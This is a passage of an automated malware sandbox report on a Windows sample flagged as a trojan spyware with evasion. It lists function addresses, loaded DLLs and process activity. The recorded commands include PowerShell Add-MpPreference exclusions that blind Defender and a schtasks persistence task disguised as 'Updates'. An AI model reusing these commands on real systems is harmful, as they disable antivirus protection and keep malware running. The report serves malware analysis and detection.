                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A995015_2_015A9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BB95015_2_015BB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163591015_2_01635910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160D80015_2_0160D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A38E015_2_015A38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165FB7615_2_0165FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01615BF015_2_01615BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015DDBF915_2_015DDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BFB8015_2_015BFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01613A6C15_2_01613A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01657A4615_2_01657A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165FA4915_2_0165FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0164DAC615_2_0164DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01641AA315_2_01641AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163DAAC15_2_0163DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015E5AA015_2_015E5AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01657D7315_2_01657D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A3D4015_2_015A3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01651D5A15_2_01651D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BFDC015_2_015BFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01619C3215_2_01619C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165FCF215_2_0165FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165FF0915_2_0165FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01563FD515_2_01563FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01563FD215_2_01563FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A1F9215_2_015A1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0165FFB115_2_0165FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015A9EB015_2_015A9EB0
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_0157D58417_2_0157D584
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_0575E63017_2_0575E630
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_0575E62A17_2_0575E62A
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_073A7F7017_2_073A7F70
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_073AB75017_2_073AB750
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_073AD50817_2_073AD508
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_073AD4F817_2_073AD4F8
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_073AB31817_2_073AB318
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_073AB30817_2_073AB308
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_073A7F6217_2_073A7F62
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_073AAEE017_2_073AAEE0
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_073ABB8817_2_073ABB88
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_0BFB2A5817_2_0BFB2A58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013C010021_2_013C0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0141600021_2_01416000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_014502C021_2_014502C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D053521_2_013D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D077021_2_013D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013F475021_2_013F4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013CC7C021_2_013CC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013EC6E021_2_013EC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013E696221_2_013E6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D29A021_2_013D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013DA84021_2_013DA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D284021_2_013D2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013B68B821_2_013B68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013FE8F021_2_013FE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0140889021_2_01408890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013CEA8021_2_013CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013DAD0021_2_013DAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013DED7A21_2_013DED7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013E8DBF21_2_013E8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013CADE021_2_013CADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D8DC021_2_013D8DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D0C0021_2_013D0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013C0CF221_2_013C0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_01444F4021_2_01444F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013F0F3021_2_013F0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_01412F2821_2_01412F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0144EFA021_2_0144EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013C2FC821_2_013C2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D0E5921_2_013D0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013E2E9021_2_013E2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0140516C21_2_0140516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013BF17221_2_013BF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013DB1B021_2_013DB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013BD34C21_2_013BD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D33F321_2_013D33F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D52A021_2_013D52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013ED2F021_2_013ED2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013EB2C021_2_013EB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013C146021_2_013C1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_014174E021_2_014174E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D349721_2_013D3497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013DB73021_2_013DB730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D995021_2_013D9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013EB95021_2_013EB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D599021_2_013D5990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0143D80021_2_0143D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D38E021_2_013D38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_01445BF021_2_01445BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0140DBF921_2_0140DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013EFB8021_2_013EFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_01443A6C21_2_01443A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D3D4021_2_013D3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013EFDC021_2_013EFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013E9C2021_2_013E9C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_01449C3221_2_01449C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D1F9221_2_013D1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013D9EB021_2_013D9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0042EDF321_2_0042EDF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0143EA12 appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0158B970 appears 275 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 015E7E54 appears 102 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0161F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0160EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01417E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 015D5130 appears 58 times
                Source: n2pGr8w21V.exeStatic PE information: invalid certificate
                Source: n2pGr8w21V.exe, 00000000.00000002.1376232222.0000000003F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe, 00000000.00000002.1379105487.0000000005790000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe, 00000000.00000002.1363113056.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe, 00000000.00000002.1379863877.0000000007370000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe, 00000000.00000000.1258208011.0000000000A72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOavGB.exe: vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe, 00000000.00000002.1373842326.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exeBinary or memory string: OriginalFilenameOavGB.exe: vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: n2pGr8w21V.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: uEugNEto.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@7/6
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeFile created: C:\Users\user\AppData\Roaming\uEugNEto.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMutant created: \Sessions\1\BaseNamedObjects\BpfRQdg
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB98D.tmpJump to behavior
                Source: n2pGr8w21V.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: n2pGr8w21V.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: systray.exe, 00000017.00000003.1758903710.00000000035A4000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2508850216.00000000035A4000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1758664954.0000000003583000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2508850216.00000000035D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: n2pGr8w21V.exeReversingLabs: Detection: 68%
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeFile read: C:\Users\user\Desktop\n2pGr8w21V.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\n2pGr8w21V.exe "C:\Users\user\Desktop\n2pGr8w21V.exe"
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uEugNEto.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\uEugNEto.exe C:\Users\user\AppData\Roaming\uEugNEto.exe
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
                Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe"Jump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uEugNEto.exe"Jump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
